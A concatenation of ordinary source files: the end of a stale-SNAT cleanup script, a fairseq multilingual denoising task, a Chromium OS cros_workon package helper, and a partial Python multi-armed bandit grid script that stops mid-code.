printo('[%s] Found stale SNAT %s' % (si.uuid, str(si.fq_name)))
if self.check is not True:
self._clean_si(si)
def __call__(self, paths=None, **kwargs):
super(CleanStaleSI, self).__call__(**kwargs)
parallel_map(self._check_si, self.resources, workers=50)
|
the-stack_106_16930
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import numpy as np
from fairseq.data import (
data_utils,
Dictionary,
AppendTokenDataset,
ConcatDataset,
DenoisingDataset,
PrependTokenDataset,
ResamplingDataset,
SortDataset,
TokenBlockDataset,
)
from .denoising import DenoisingTask
from fairseq.data.encoders.utils import get_whole_word_mask
from fairseq.tasks import register_task
logger = logging.getLogger(__name__)
@register_task('multilingual_denoising')
class MultilingualDenoisingTask(DenoisingTask):
@staticmethod
def add_args(parser):
DenoisingTask.add_args(parser)
parser.add_argument('--multilang-sampling-alpha', type=float, default=1.0,
help='smoothing alpha for sample rations across multiple datasets')
parser.add_argument('--add-lang-token', default=False, action='store_true')
parser.add_argument('--langs', type=str, help="language ids we are considering", default=None)
@classmethod
def setup_task(cls, args, **kwargs):
"""Setup the task.
"""
paths = args.data.split(':')
assert len(paths) > 0
dictionary = Dictionary.load(os.path.join(paths[0], 'dict.txt'))
data_path = paths[0]
if args.langs is None:
languages = sorted([
name for name in os.listdir(data_path)
if os.path.isdir(os.path.join(data_path, name))
])
else:
languages = sorted(args.langs.split(','))
for name in languages:
assert os.path.exists(os.path.join(data_path, name)), \
"{} does not exist".format(os.path.join(data_path, name))
if args.add_lang_token:
for lang in languages:
dictionary.add_symbol('[{}]'.format(lang))
logger.info("| dictionary: {} types".format(len(dictionary)))
if not hasattr(args, 'shuffle_instance'):
args.shuffle_instance = False
return cls(args, dictionary)
def __init__(self, args, dictionary):
super().__init__(args, dictionary)
self.dictionary = dictionary
self.seed = args.seed
# add mask token
self.mask_idx = self.dictionary.add_symbol('<mask>')
self.langs = args.langs
self.args = args
def _get_sample_prob(self, dataset_lens):
"""
        Get smoothed sampling probability by languages. This helps low resource
languages by upsampling them.
"""
prob = dataset_lens / dataset_lens.sum()
smoothed_prob = prob ** self.args.multilang_sampling_alpha
smoothed_prob = smoothed_prob / smoothed_prob.sum()
return smoothed_prob
def load_dataset(self, split, epoch=0, combine=False, **kwargs):
"""Load a given dataset split.
Args:
split (str): name of the split (e.g., train, valid, test)
"""
paths = self.args.data.split(':')
assert len(paths) > 0
data_path = paths[epoch % len(paths)]
split_path = os.path.join(data_path, split)
if self.langs is None:
languages = sorted([
name for name in os.listdir(data_path)
if os.path.isdir(os.path.join(data_path, name))
])
else:
languages = sorted(self.langs.split(','))
for name in languages:
assert os.path.exists(os.path.join(data_path, name)), "all the languages must exist"
logger.info("| Training on {0} languages: {1}".format(len(languages), languages))
        logger.info("| Language to id mapping: %s", {
            lang: id for id, lang in enumerate(languages)
        })
mask_whole_words = get_whole_word_mask(self.args, self.dictionary)
lang_datasets = []
for language in languages:
split_path = os.path.join(data_path, language, split)
dataset = data_utils.load_indexed_dataset(
split_path,
self.source_dictionary,
self.args.dataset_impl,
combine=combine,
)
if dataset is None:
raise FileNotFoundError('Dataset not found: {} ({})'.format(split, split_path))
end_token = self.source_dictionary.index('[{}]'.format(language)) \
if self.args.add_lang_token else self.source_dictionary.eos()
# create continuous blocks of tokens
dataset = TokenBlockDataset(
dataset,
dataset.sizes,
self.args.tokens_per_sample - 2, # one less for <s>
pad=self.source_dictionary.pad(),
eos=end_token,
break_mode=self.args.sample_break_mode,
)
logger.info('| loaded {} blocks from: {}'.format(len(dataset), split_path))
# prepend beginning-of-sentence token (<s>, equiv. to [CLS] in BERT)
dataset = PrependTokenDataset(dataset, self.source_dictionary.bos())
dataset = AppendTokenDataset(dataset, end_token)
lang_dataset = DenoisingDataset(
dataset,
dataset.sizes,
self.dictionary,
self.mask_idx,
mask_whole_words,
shuffle=self.args.shuffle_instance,
seed=self.seed,
args=self.args,
eos=None if not self.args.add_lang_token else self.source_dictionary.index('[{}]'.format(language)),
)
lang_datasets.append(lang_dataset)
dataset_lengths = np.array(
[len(d) for d in lang_datasets],
dtype=float,
)
logger.info(
'| loaded total {} blocks for all languages'.format(
dataset_lengths.sum(),
)
)
if split == self.args.train_subset:
# For train subset, additionally up or down sample languages.
sample_probs = self._get_sample_prob(dataset_lengths)
            logger.info("| Sample probability by language: %s", {
                lang: "{0:.4f}".format(sample_probs[id])
                for id, lang in enumerate(languages)
            })
size_ratio = (sample_probs * dataset_lengths.sum()) / dataset_lengths
            logger.info("| Up/Down Sampling ratio by language: %s", {
                lang: "{0:.2f}".format(size_ratio[id])
                for id, lang in enumerate(languages)
            })
resampled_lang_datasets = [
ResamplingDataset(
lang_datasets[i],
size_ratio=size_ratio[i],
seed=self.args.seed,
epoch=epoch,
replace=size_ratio[i] >= 1.0,
)
for i, d in enumerate(lang_datasets)
]
dataset = ConcatDataset(
resampled_lang_datasets,
)
else:
dataset = ConcatDataset(lang_datasets)
lang_splits = [split]
for lang_id, lang_dataset in enumerate(lang_datasets):
split_name = split + '_' + languages[lang_id]
lang_splits.append(split_name)
self.datasets[split_name] = lang_dataset
if split in self.args.valid_subset:
self.args.valid_subset = self.args.valid_subset.replace(
split, ','.join(lang_splits)
)
with data_utils.numpy_seed(self.args.seed + epoch):
shuffle = np.random.permutation(len(dataset))
self.datasets[split] = SortDataset(
dataset,
sort_order=[
shuffle,
dataset.sizes,
],
)
|
the-stack_106_16931
|
# -*- coding: utf-8 -*-
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Routines and a delegate for dealing with locally worked on packages."""
from __future__ import print_function
import collections
import glob
import os
import re
import sys
from chromite.lib import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import git
from chromite.lib import osutils
from chromite.lib import portage_util
from chromite.lib import sysroot_lib
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
# A package is a canonical CP atom.
# A package may have 0 or more repositories, given as strings.
# Each repository may be mapped into our workspace at some path.
PackageInfo = collections.namedtuple('PackageInfo',
('package', 'repos', 'src_paths'))
def _IsWorkonEbuild(include_chrome, ebuild_path, ebuild_contents=None):
"""Returns True iff the ebuild at |ebuild_path| is a workon ebuild.
This means roughly that the ebuild is compatible with our cros_workon based
  system. For most packages, this means that it inherits from the cros-workon
  eclass.
Args:
include_chrome: True iff we should include Chrome and chromium-source
packages.
    ebuild_path: path to the ebuild in question.
ebuild_contents: None, or the contents of the ebuild at |ebuild_path|.
If None, _IsWorkonEbuild will read the contents of the ebuild when
necessary.
Returns:
True iff the ebuild can be used with cros_workon.
"""
# TODO(rcui): remove special casing of chromeos-chrome here when we make it
# inherit from cros-workon / chromium-source class (chromium-os:19259).
if (include_chrome and
portage_util.EbuildToCP(ebuild_path) == constants.CHROME_CP):
return True
workon_eclasses = 'cros-workon'
if include_chrome:
workon_eclasses += '|chromium-source'
ebuild_contents = ebuild_contents or osutils.ReadFile(ebuild_path)
if re.search('^inherit .*(%s)' % workon_eclasses,
ebuild_contents, re.M):
return True
return False
def _GetLinesFromFile(path, line_prefix, line_suffix):
"""Get a unique set of lines from a file, stripping off a prefix and suffix.
Rejects lines that do not start with |line_prefix| or end with |line_suffix|.
Returns an empty set if the file at |path| does not exist.
Discards duplicate lines.
Args:
path: path to file.
line_prefix: prefix of line to look for and strip if found.
line_suffix: suffix of line to look for and strip if found.
Returns:
    A set of filtered lines from the file at |path|.
"""
if not os.path.exists(path):
return set()
# Note that there is an opportunity to race with the file system here.
lines = set()
for line in osutils.ReadFile(path).splitlines():
if not line.startswith(line_prefix) or not line.endswith(line_suffix):
logging.warning('Filtering out malformed line: %s', line)
continue
lines.add(line[len(line_prefix):-len(line_suffix)])
return lines
def _WriteLinesToFile(path, lines, line_prefix, line_suffix):
"""Write a set of lines to a file, adding prefixes, suffixes and newlines.
Args:
path: path to file.
lines: iterable of lines to write.
line_prefix: string to prefix each line with.
line_suffix: string to append to each line before a newline.
"""
contents = ''.join(
['%s%s%s\n' % (line_prefix, line, line_suffix) for line in lines])
if not contents:
osutils.SafeUnlink(path)
else:
osutils.WriteFile(path, contents, makedirs=True)
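# Illustrative sketch (paths and values assumed, not part of the original
# module): the two helpers above round-trip atom lists through the cros_workon
# file format; for the workon file the prefix is '=' and the suffix is '-9999':
#
#   _WriteLinesToFile('/tmp/host', {'sys-apps/dbus'}, '=', '-9999')
#   # file now contains:  =sys-apps/dbus-9999
#   _GetLinesFromFile('/tmp/host', '=', '-9999')
#   # -> {'sys-apps/dbus'}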
def GetWorkonPath(source_root=constants.CHROOT_SOURCE_ROOT, sub_path=None):
"""Get the path to files related to packages we're working locally on.
Args:
source_root: path to source root inside chroot.
sub_path: optional path to file relative to the workon root directory.
Returns:
path to the workon root directory or file within the root directory.
"""
ret = os.path.join(source_root, '.config/cros_workon')
if sub_path:
ret = os.path.join(ret, sub_path)
return ret
class WorkonError(Exception):
"""Raised when invariants of the WorkonHelper are violated."""
def _FilterWorkonOnlyEbuilds(ebuilds):
"""Filter a list of ebuild paths to only with those no stable version.
Args:
ebuilds: list of string paths to ebuild files
(e.g. ['/prefix/sys-app/app/app-9999.ebuild'])
Returns:
list of ebuild paths meeting this criterion.
"""
result = []
for ebuild_path in ebuilds:
ebuild_pattern = os.path.join(os.path.dirname(ebuild_path), '*.ebuild')
stable_ebuilds = [path for path in glob.glob(ebuild_pattern)
if not path.endswith('-9999.ebuild')]
if not stable_ebuilds:
result.append(ebuild_path)
return result
def ListAllWorkedOnAtoms(src_root=constants.CHROOT_SOURCE_ROOT):
"""Get a list of all atoms we're currently working on.
Args:
src_root: path to source root inside chroot.
Returns:
Dictionary of atoms marked as worked on (e.g. ['chromeos-base/shill']) for
each system.
"""
workon_dir = GetWorkonPath(source_root=src_root)
if not os.path.isdir(workon_dir):
return dict()
system_to_atoms = dict()
for file_name in os.listdir(workon_dir):
if file_name.endswith('.mask'):
continue
file_contents = osutils.ReadFile(os.path.join(workon_dir, file_name))
atoms = []
for line in file_contents.splitlines():
match = re.match('=(.*)-9999', line)
if match:
atoms.append(match.group(1))
if atoms:
system_to_atoms[os.path.basename(file_name)] = atoms
return system_to_atoms
class WorkonHelper(object):
"""Delegate that knows how to mark packages as being worked on locally.
This class assumes that we're executing in the build root.
"""
def __init__(self, sysroot, friendly_name=None, verbose=False,
src_root=constants.CHROOT_SOURCE_ROOT):
"""Construct an instance.
Args:
sysroot: path to sysroot to work on packages within.
friendly_name: friendly name of the system
(e.g. 'host', <board name>, or a brick friendly name).
Defaults to 'host' if sysroot is '/' or the last component of the
sysroot path.
verbose: boolean True iff we should print a lot more command output.
This is intended for debugging, and you should never cause a script
to depend on behavior enabled by this flag.
src_root: path to source root inside chroot.
"""
self._sysroot = sysroot
if friendly_name:
self._system = friendly_name
else:
self._system = ('host' if sysroot == '/'
else os.path.basename(sysroot.rstrip('/')))
self._verbose = verbose
self._src_root = src_root
self._cached_overlays = None
self._cached_arch = None
profile = os.path.join(self._sysroot, 'etc', 'portage')
self._unmasked_symlink = os.path.join(
profile, 'package.unmask', 'cros-workon')
self._keywords_symlink = os.path.join(
profile, 'package.keywords', 'cros-workon')
self._masked_symlink = os.path.join(
profile, 'package.mask', 'cros-workon')
# Clobber and re-create the WORKON_FILE symlinks every time. This is a
# trivial operation and eliminates all kinds of corner cases as well as any
# possible future renames of WORKON_FILE.
# In particular, we build the chroot as a board (amd64-host), bundle it and
# unpack it on /. After unpacking, the symlinks will point to
# .config/cros_workon/amd64-host instead of .config/cros_workon/host.
# Regenerating the symlinks here corrects it. crbug.com/23096.
# Note: This is currently also relied upon as an indirect fix for
# crbug.com/679831. Search the bug number for instance(s).
self._RefreshSymlinks()
@property
def workon_file_path(self):
"""Returns path to the file holding our currently worked on atoms."""
return GetWorkonPath(source_root=self._src_root, sub_path=self._system)
@property
def masked_file_path(self):
"""Returns path to file masking non-9999 ebuilds for worked on atoms."""
return self.workon_file_path + '.mask'
@property
def _arch(self):
if self._cached_arch is None:
self._cached_arch = sysroot_lib.Sysroot(
self._sysroot).GetStandardField(sysroot_lib.STANDARD_FIELD_ARCH)
return self._cached_arch
@property
def _overlays(self):
"""Returns overlays installed for the selected system."""
if self._cached_overlays is None:
sysroot = sysroot_lib.Sysroot(self._sysroot)
portdir_overlay = sysroot.GetStandardField('PORTDIR_OVERLAY')
if portdir_overlay:
self._cached_overlays = portdir_overlay.strip().splitlines()
else:
# This command is exceptionally slow, and we don't expect the list of
# overlays to change during the lifetime of WorkonHelper.
self._cached_overlays = portage_util.FindSysrootOverlays(self._sysroot)
return self._cached_overlays
def _SetWorkedOnAtoms(self, atoms):
"""Sets the unmasked atoms.
This will generate both the unmasked atom list and the masked atoms list as
the two files mention the same atom list.
Args:
atoms: Atoms to unmask.
"""
_WriteLinesToFile(self.workon_file_path, atoms, '=', '-9999')
_WriteLinesToFile(self.masked_file_path, atoms, '<', '-9999')
self._RefreshSymlinks()
def _RefreshSymlinks(self):
"""Recreates the symlinks.
This will create the three symlinks needed:
* package.mask/cros-workon: list of packages to mask.
* package.unmask/cros-workon: list of packages to unmask.
* package.keywords/cros-workon: list of hidden packages to accept.
"""
if not os.path.exists(self._sysroot):
return
for target, symlink in ((self.masked_file_path, self._masked_symlink),
(self.workon_file_path, self._unmasked_symlink),
(self.workon_file_path, self._keywords_symlink)):
if os.path.exists(target):
osutils.SafeMakedirs(os.path.dirname(symlink), sudo=True)
osutils.SafeSymlink(target, symlink, sudo=True)
else:
logging.debug("Symlink %s already exists. Don't recreate it.",
symlink)
def _AtomsToEbuilds(self, atoms):
"""Maps from a list of CP atoms to a list of corresponding -9999 ebuilds.
Args:
atoms: iterable of portage atoms (e.g. ['sys-apps/dbus']).
Returns:
list of ebuilds corresponding to those atoms.
"""
atoms_to_ebuilds = dict([(atom, None) for atom in atoms])
for overlay in self._overlays:
ebuild_paths = glob.glob(
os.path.join(overlay, '*-*', '*', '*-9999.ebuild'))
for ebuild_path in ebuild_paths:
atom = portage_util.EbuildToCP(ebuild_path)
if atom in atoms_to_ebuilds:
atoms_to_ebuilds[atom] = ebuild_path
ebuilds = []
for atom, ebuild in atoms_to_ebuilds.items():
if ebuild is None:
raise WorkonError('Could not find ebuild for atom %s' % atom)
ebuilds.append(ebuild)
return ebuilds
def _GetCanonicalAtom(self, package, find_stale=False):
"""Transform a package name or name fragment to the canonical atom.
If there are multiple atoms that a package name fragment could map to,
picks an arbitrary one and prints a warning.
Args:
package: string package name or fragment of a name.
find_stale: if True, allow stale (missing) worked on package.
Returns:
string canonical atom name (e.g. 'sys-apps/dbus')
"""
# Attempt to not hit portage if at all possible for speed.
if package in self._GetWorkedOnAtoms():
return package
# Ask portage directly what it thinks about that package.
ebuild_path = self._FindEbuildForPackage(package)
# If portage didn't know about that package, try and autocomplete it.
if ebuild_path is None:
possible_ebuilds = set()
for ebuild in (portage_util.EbuildToCP(ebuild) for ebuild in
self._GetWorkonEbuilds(filter_on_arch=False)):
if package in ebuild:
possible_ebuilds.add(ebuild)
# Also autocomplete from the worked-on list, in case the ebuild was
# deleted.
if find_stale:
for ebuild in self._GetWorkedOnAtoms():
if package in ebuild:
possible_ebuilds.add(ebuild)
if not possible_ebuilds:
logging.warning('Could not find canonical package for "%s"', package)
return None
# We want some consistent order for making our selection below.
possible_ebuilds = sorted(possible_ebuilds)
if len(possible_ebuilds) > 1:
logging.warning('Multiple autocompletes found:')
for possible_ebuild in possible_ebuilds:
logging.warning(' %s', possible_ebuild)
autocompleted_package = portage_util.EbuildToCP(possible_ebuilds[0])
# Sanity check to avoid infinite loop.
if package == autocompleted_package:
logging.error('Resolved %s to itself', package)
return None
logging.info('Autocompleted "%s" to: "%s"',
package, autocompleted_package)
return self._GetCanonicalAtom(autocompleted_package)
if not _IsWorkonEbuild(True, ebuild_path):
msg = ('In order to cros_workon a package, it must have a -9999 ebuild '
'that inherits from cros-workon.\n')
if '-9999' in ebuild_path:
msg += ('"%s" is a -9999 ebuild, make sure it inherits from '
'cros-workon.\n' % ebuild_path)
else:
msg += '"%s" is not a -9999 ebuild.\n' % ebuild_path
logging.warning(msg)
return None
return portage_util.EbuildToCP(ebuild_path)
def _GetCanonicalAtoms(self, packages, find_stale=False):
"""Transforms a list of package name fragments into a list of CP atoms.
Args:
packages: list of package name fragments.
find_stale: if True, allow stale (missing) worked on package.
Returns:
list of canonical portage atoms corresponding to the given fragments.
"""
if not packages:
raise WorkonError('No packages specified')
if len(packages) == 1 and packages[0] == '.':
raise WorkonError('Working on the current package is no longer '
'supported.')
atoms = []
for package_fragment in packages:
atom = self._GetCanonicalAtom(package_fragment, find_stale=find_stale)
if atom is None:
raise WorkonError('Error parsing package list')
atoms.append(atom)
return atoms
def _GetWorkedOnAtoms(self):
"""Returns a list of CP atoms that we're currently working on."""
return _GetLinesFromFile(self.workon_file_path, '=', '-9999')
def _FindEbuildForPackage(self, package):
"""Find an ebuild for a given atom (accepting even masked ebuilds).
Args:
package: package string.
Returns:
path to ebuild for given package.
"""
return portage_util.FindEbuildForPackage(
package, self._sysroot, include_masked=True,
extra_env={'ACCEPT_KEYWORDS': '~%s' % self._arch})
def _GetWorkonEbuilds(self, filter_workon=False, filter_on_arch=True,
include_chrome=True):
"""Get a list of all cros-workon ebuilds in the current system.
Args:
filter_workon: True iff we should filter the list of ebuilds to those
packages which define only a workon ebuild (i.e. no stable version).
filter_on_arch: True iff we should only return ebuilds which are marked
as unstable for the architecture of the system we're interested in.
include_chrome: True iff we should also include chromeos-chrome and
related ebuilds. These ebuilds can be worked on, but don't work
like normal cros-workon ebuilds.
Returns:
list of paths to ebuilds meeting the above criteria.
"""
result = []
if filter_on_arch:
keyword_pat = re.compile(r'^KEYWORDS=".*~(\*|%s).*"$' % self._arch, re.M)
for overlay in self._overlays:
ebuild_paths = glob.glob(
os.path.join(overlay, '*-*', '*', '*-9999.ebuild'))
for ebuild_path in ebuild_paths:
ebuild_contents = osutils.ReadFile(ebuild_path)
if not _IsWorkonEbuild(include_chrome, ebuild_path,
ebuild_contents=ebuild_contents):
continue
if filter_on_arch and not keyword_pat.search(ebuild_contents):
continue
result.append(ebuild_path)
if filter_workon:
result = _FilterWorkonOnlyEbuilds(result)
return result
def _GetLiveAtoms(self, filter_workon=False):
"""Get a list of atoms currently marked as being locally compiled.
Args:
filter_workon: True iff the list should be filtered to only those
atoms without a stable version (i.e. the -9999 ebuild is the
only ebuild).
Returns:
list of canonical portage atoms.
"""
atoms = self._GetWorkedOnAtoms()
if filter_workon:
ebuilds = _FilterWorkonOnlyEbuilds(self._AtomsToEbuilds(atoms))
return [portage_util.EbuildToCP(ebuild) for ebuild in ebuilds]
return atoms
def _AddProjectsToPartialManifests(self, atoms):
"""Add projects corresponding to a list of atoms to the local manifest.
If we mark projects as workon that we don't have in our local checkout,
it is convenient to have them added to the manifest. Note that users
will need to `repo sync` to pull down repositories added in this way.
Args:
atoms: iterable of atoms to ensure are in the manifest.
"""
if git.ManifestCheckout.IsFullManifest(self._src_root):
# If we're a full manifest, there is nothing to do.
return
should_repo_sync = False
for ebuild_path in self._AtomsToEbuilds(atoms):
infos = portage_util.GetRepositoryForEbuild(ebuild_path, self._sysroot)
for info in infos:
if not info.project:
continue
cmd = ['loman', 'add', '--workon', info.project]
cros_build_lib.run(cmd, print_cmd=False)
should_repo_sync = True
if should_repo_sync:
print('Please run "repo sync" now.')
def ListAtoms(self, use_all=False, use_workon_only=False):
"""Returns a list of interesting atoms.
By default, return a list of the atoms marked as being locally worked on
for the system in question.
Args:
use_all: If true, return a list of all atoms we could possibly work on
for the system in question.
use_workon_only: If true, return a list of all atoms we could possibly
work on that have no stable ebuild.
Returns:
a list of atoms (e.g. ['chromeos-base/shill', 'sys-apps/dbus']).
"""
if use_workon_only or use_all:
ebuilds = self._GetWorkonEbuilds(filter_workon=use_workon_only)
packages = [portage_util.EbuildToCP(ebuild) for ebuild in ebuilds]
else:
packages = self._GetLiveAtoms()
return sorted(packages)
def StartWorkingOnPackages(self, packages, use_all=False,
use_workon_only=False):
"""Mark a list of packages as being worked on locally.
Args:
packages: list of package name fragments. While each fragment could be a
complete portage atom, this helper will attempt to infer intent by
looking for fragments in a list of all possible atoms for the system
in question.
use_all: True iff we should ignore the package list, and instead consider
all possible atoms that we could mark as worked on locally.
use_workon_only: True iff we should ignore the package list, and instead
consider all possible atoms for the system in question that define
only the -9999 ebuild.
"""
if not os.path.exists(self._sysroot):
raise WorkonError('Sysroot %s is not setup.' % self._sysroot)
if use_all or use_workon_only:
ebuilds = self._GetWorkonEbuilds(filter_workon=use_workon_only)
atoms = [portage_util.EbuildToCP(ebuild) for ebuild in ebuilds]
else:
atoms = self._GetCanonicalAtoms(packages)
atoms = set(atoms)
# Read out what atoms we're already working on.
existing_atoms = self._GetWorkedOnAtoms()
# Warn the user if they're requested to work on an atom that's already
# marked as being worked on.
for atom in atoms & existing_atoms:
logging.warning('Already working on %s', atom)
# If we have no new atoms to work on, we can quit now.
new_atoms = atoms - existing_atoms
if not new_atoms:
return
# Write out all these atoms to the appropriate files.
current_atoms = new_atoms | existing_atoms
self._SetWorkedOnAtoms(current_atoms)
self._AddProjectsToPartialManifests(new_atoms)
# Legacy scripts used single quotes in their output, and we carry on this
# honorable tradition.
logging.info("Started working on '%s' for '%s'",
' '.join(new_atoms), self._system)
def StopWorkingOnPackages(self, packages, use_all=False,
use_workon_only=False):
"""Stop working on a list of packages currently marked as locally worked on.
Args:
packages: list of package name fragments. These will be mapped to
canonical portage atoms via the same process as
StartWorkingOnPackages().
use_all: True iff instead of the provided package list, we should just
stop working on all currently worked on atoms for the system in
question.
use_workon_only: True iff instead of the provided package list, we should
stop working on all currently worked on atoms that define only a
-9999 ebuild.
"""
if use_all or use_workon_only:
atoms = self._GetLiveAtoms(filter_workon=use_workon_only)
else:
atoms = self._GetCanonicalAtoms(packages, find_stale=True)
current_atoms = self._GetWorkedOnAtoms()
stopped_atoms = []
for atom in atoms:
if not atom in current_atoms:
logging.warning('Not working on %s', atom)
continue
current_atoms.discard(atom)
stopped_atoms.append(atom)
self._SetWorkedOnAtoms(current_atoms)
if stopped_atoms:
# Legacy scripts used single quotes in their output, and we carry on this
# honorable tradition.
logging.info("Stopped working on '%s' for '%s'",
' '.join(stopped_atoms), self._system)
def GetPackageInfo(self, packages, use_all=False, use_workon_only=False):
"""Get information about packages.
Args:
packages: list of package name fragments. These will be mapped to
canonical portage atoms via the same process as
StartWorkingOnPackages().
      use_all: True iff instead of the provided package list, we should
          report on all possible workon-able atoms for the system in
          question.
      use_workon_only: True iff instead of the provided package list, we should
          report on all workon-able atoms that define only a -9999 ebuild.
Returns:
Returns a list of PackageInfo tuples.
"""
if use_all or use_workon_only:
# You can't use info to find the source code from Chrome, since that
# workflow is different.
ebuilds = self._GetWorkonEbuilds(filter_workon=use_workon_only,
include_chrome=False)
else:
atoms = self._GetCanonicalAtoms(packages)
ebuilds = [self._FindEbuildForPackage(atom) for atom in atoms]
build_root = self._src_root
src_root = os.path.join(build_root, 'src')
manifest = git.ManifestCheckout.Cached(build_root)
ebuild_to_repos = {}
ebuild_to_src_paths = collections.defaultdict(list)
for ebuild in ebuilds:
workon_vars = portage_util.EBuild.GetCrosWorkonVars(
ebuild, portage_util.EbuildToCP(ebuild))
projects = workon_vars.project if workon_vars else []
ebuild_to_repos[ebuild] = projects
ebuild_obj = portage_util.EBuild(ebuild)
if ebuild_obj.is_blacklisted:
# blacklisted ebuilds may have source infos incorrectly defined since
# they are not validated by bots
continue
src_paths = ebuild_obj.GetSourceInfo(src_root, manifest).srcdirs
src_paths = [os.path.relpath(path, build_root) for path in src_paths]
ebuild_to_src_paths[ebuild] = src_paths
result = []
for ebuild in ebuilds:
package = portage_util.EbuildToCP(ebuild)
repos = ebuild_to_repos.get(ebuild, [])
src_paths = ebuild_to_src_paths.get(ebuild, [])
result.append(PackageInfo(package, repos, src_paths))
result.sort()
return result
def RunCommandInAtomSourceDirectory(self, atom, command):
"""Run a command in the source directory of an atom.
Args:
atom: string atom to run the command in (e.g. 'chromeos-base/shill').
command: string shell command to run in the source directory of |atom|.
"""
logging.info('Running "%s" on %s', command, atom)
ebuild_path = self._FindEbuildForPackage(atom)
if ebuild_path is None:
raise WorkonError('Error looking for atom %s' % atom)
for info in portage_util.GetRepositoryForEbuild(ebuild_path, self._sysroot):
cros_build_lib.run(command, shell=True, cwd=info.srcdir, print_cmd=False)
def RunCommandInPackages(self, packages, command, use_all=False,
use_workon_only=False):
"""Run a command in the source directory of a list of packages.
Args:
packages: list of package name fragments.
command: string shell command to run in the source directory of |atom|.
use_all: True iff we should ignore the package list, and instead consider
all possible workon-able atoms.
use_workon_only: True iff we should ignore the package list, and instead
consider all possible atoms for the system in question that define
only the -9999 ebuild.
"""
if use_all or use_workon_only:
atoms = self._GetLiveAtoms(filter_workon=use_workon_only)
else:
atoms = self._GetCanonicalAtoms(packages)
for atom in atoms:
self.RunCommandInAtomSourceDirectory(atom, command)
def InstalledWorkonAtoms(self):
"""Returns the set of installed cros_workon packages."""
installed_cp = set()
for pkg in portage_util.PortageDB(self._sysroot).InstalledPackages():
installed_cp.add('%s/%s' % (pkg.category, pkg.package))
return set(a for a in self.ListAtoms(use_all=True) if a in installed_cp)
|
the-stack_106_16932
|
import numpy as np
from math import sqrt, log
from Bandit import Bandit
#from maze import Sets
'''
def get_nearby_set_to_ban(set_index_list, bandit_index, ban_to_set_dict):
sets = ban_to_set_dict[str(bandit_index)]
min_index = set_index_list[0]
min = abs(sets[0]-min_index)
for i in set_index_list:
for j in sets:
if abs(j-i) < min:
min_index = i
min = abs(j-i)
return min_index
'''
def euclidian_dist(c1, c2):
return (c1[0]-c2[0])**2 + (c1[1]-c2[1])**2
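# Note (editorial): despite its name, euclidian_dist returns the *squared*
# Euclidean distance, e.g. euclidian_dist((0, 0), (3, 4)) == 25, not 5.
# Since it is only used for comparisons below, the ordering is unaffected.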
#for maze formation
def get_nearby_set_to_ban(set_index_list, bandit_index, ban_to_set_dict):
sets = ban_to_set_dict[str(bandit_index)]
current_coordinates = [(i//10, i%10) for i in set_index_list]
ban_coordinates = [(i//10, i%10) for i in sets]
min_index = set_index_list[0]
min = euclidian_dist(ban_coordinates[0], current_coordinates[0])
for i in range(len(current_coordinates)):
for j in range(len(ban_coordinates)):
dist = euclidian_dist(current_coordinates[i], ban_coordinates[j])
if dist < min:
min_index = set_index_list[i]
min = dist
return min_index
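# Illustrative note: indices are laid out on an assumed 10x10 grid, so index 37
# maps to coordinates (37 // 10, 37 % 10) == (3, 7); the helper above returns
# the adjacent-set index whose cell lies closest to any of the bandit's sets.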
#for maze formation in a single choice setting
def get_nearby_set_to_ban_1(set_index_list, bandit_index, ban_to_set_dict):
sets = ban_to_set_dict[str(bandit_index)]
current_coordinates = [(i//10, i%10) for i in set_index_list]
#ban_coordinates = [(i//10, i%10) for i in sets]
ban_coordinate = (bandit_index//10, bandit_index%10)
min_index = set_index_list[0]
min = euclidian_dist(ban_coordinate, current_coordinates[0])
    for i in range(len(current_coordinates)):
        # only one bandit coordinate here, so no inner loop is needed
        dist = euclidian_dist(current_coordinates[i], ban_coordinate)
        if dist < min:
            min_index = set_index_list[i]
            min = dist
return min_index
class Set():
def __init__(self, index, bandit_list, adj_set):
self.index = index
self.bandit_list = {}
for ban in bandit_list:
self.bandit_list[str(ban.index)] = ban
self.bandit_list_index = set([ban.index for ban in bandit_list])
self.adj_sets = adj_set
def is_ban_in(self, bandit_index):
if bandit_index in self.bandit_list_index:
return True
else:
return False
def get_bandit(self, bandit_index):
try:
return self.bandit_list[str(bandit_index)]
except KeyError:
return "Bandit not in the Set"
def get_ban_set(self,bandit_index, Global_Set, ban_to_set_dict):
set_in = get_nearby_set_to_ban_1(set_index_list=self.adj_sets, bandit_index=bandit_index, ban_to_set_dict=ban_to_set_dict)
return Global_Set[set_in]
'''
mean = np.load("Mean.npy")
variance = np.load("Variance.npy")
no_bandits = 100
Bandits = [Bandit(i, mean=mean[i], std=variance[i]) for i in range(no_bandits)]
Sets = []
for i in range(1,9):
for j in range(1, 9):
Sets.append(Set(index=i*10+j,bandit_list=[
Bandits[(i-1)*10 + j],
Bandits[(i-1)*10 + j-1],
Bandits[(i-1)*10 + j+1],
Bandits[(i+1)*10 + j],
Bandits[(i+1)*10 + j-1],
Bandits[(i+1)*10 + j+1],
Bandits[i*10+j],
Bandits[i*10 + j-1],
Bandits[i*10 + j+1]
],adj_set=[
(i-1)*10 + j,
(i-1)*10 + j-1,
(i-1)*10 + j+1,
(i+1)*10 + j,
(i+1)*10 + j-1,
(i+1)*10 + j+1,
i*10 + j-1,
i*10 + j+1
]))
for i in range(1, 9):
Sets.append(Set(index=i,bandit_list=[
Bandits[(i+1)*10 + 1],
Bandits[(i+1)*10 - 1],
Bandits[(i+1)*10],
Bandits[i],
Bandits[i-1],
Bandits[i+1]
],adj_set=[
(i+1)*10,
(i+1)*10-1,
(i+1)*10+1,
i-1,
i+1
]))
j = i*10
k = i
Sets.append(Set(index=j,bandit_list=[
Bandits[(k+1)*10 + 1],
Bandits[(k+1)*10],
Bandits[j+1],
Bandits[j],
Bandits[(k-1)*10 +1],
Bandits[(k-1)*10]
],adj_set=[
(k+1)*10,
(k+1)*10+1,
(k-1)*10+1,
(k-1)*10,
j+1
]))
j = i*10+9
k = i
Sets.append(Set(index=j,bandit_list=[
Bandits[(k+1)*10 + 8],
Bandits[(k+1)*10 + 9],
Bandits[j-1],
Bandits[j],
Bandits[(k-1)*10 + 8],
Bandits[(k-1)*10 + 9]
],adj_set=[
(k+1)*10 + 9,
(k+1)*10 + 8,
